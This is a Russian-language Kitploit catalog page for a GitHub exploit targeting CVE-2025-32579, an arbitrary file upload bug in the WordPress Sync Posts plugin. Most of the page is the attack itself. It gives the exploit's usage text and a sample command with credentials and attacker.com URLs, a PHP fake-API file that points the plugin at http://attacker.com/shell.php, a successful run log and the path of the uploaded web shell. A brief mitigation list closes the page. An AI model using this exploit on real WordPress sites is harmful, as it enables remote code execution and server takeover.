Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32579 — Плагин WordPress Sync Posts Plugin <= 1.0 уязвим к произвольной загрузке файлов. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-32579
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

Плагин WordPress Sync Posts Plugin <= 1.0 уязвим к произвольной загрузке файлов.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ CVE-2025-32579 - Критическая RCE-уязвимость в плагине Sync Posts (WordPress)

📦 Затрагивает: Sync Posts <= 1.0
🧨 Оценка CVSS: 9.9 КРИТИЧЕСКАЯ
📁 Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Обзор уязвимости

Плагин Sync Posts для WordPress от SoftClever Limited содержит уязвимость неограниченной загрузки файлов, которая позволяет аутентифицированным злоумышленникам загружать и выполнять произвольные PHP-файлы (например, веб-шеллы) на сервере.

🔓 Корневая причина:

  • Плагин принимает website_url, возвращающий JSON-записи.
  • Он вслепую получает изображения из содержимого записей без проверки.
  • Не применяется никаких ограничений на тип файла, MIME-тип или путь.
  • Все изображения (даже PHP-файлы) скачиваются и сохраняются в wp-content/uploads.

🚨 Чем это опасно

  • ✅ Удалённое выполнение кода (RCE)
  • ✅ Загружает веб-шеллы прямо на сервер
  • ✅ Требует минимальных привилегий (только аутентифицированный пользователь)

⚙️ Описание скрипта (эксплойт)

Скрипт эксплойта автоматизирует всю цепочку:

  1. 📥 Входит в WordPress, используя предоставленные учётные данные
  2. 🧠 Генерирует поддельный API на PHP, возвращающий JSON-запись с шеллом в виде <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 Отправляет вредоносный website_url на admin-ajax.php?action=sync_posts
  4. 💣 Заставляет плагин получить и сохранить шелл в /uploads/
  5. ✅ Не нужен Referer или nonce — достаточно cookie сессии

usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Инструкция по использованию

📌 Формат команды:

python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Аргументы:

ФлагОписание
-u, --urlЦелевой URL WordPress
-un, --usernameИмя пользователя WordPress (admin)
-p, --passwordПароль WordPress
-ws, --websiteURL вредоносного PHP-файла, возвращающего поддельный JSON-пост
-shell, --webshellФактический файл шелла для внедрения через ``

Вы также можете использовать фиктивное изображение вместо реального шелла для тестирования:

--webshell https://via.placeholder.com/1x1.jpg

🧪 Пример вывода поддельного API

Это ответ, возвращаемый файлом Khaled_alenazi.php:

<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Успешный эксплойт:

[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 После успешной эксплуатации:

  • Путь и имя шелла: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Исправление / Митигирование

  • Ограничьте доступ к website_url внутренними доменами или хостами из белого списка
  • Проверяйте расширения изображений и типы содержимого
  • Избегайте обработки стороннего JSON без санитизации

🧷 Ссылка

CVE: CVE-2025-32579
Эксплойт от Nxploited (Khaled Alenazi)


Скачать инструмент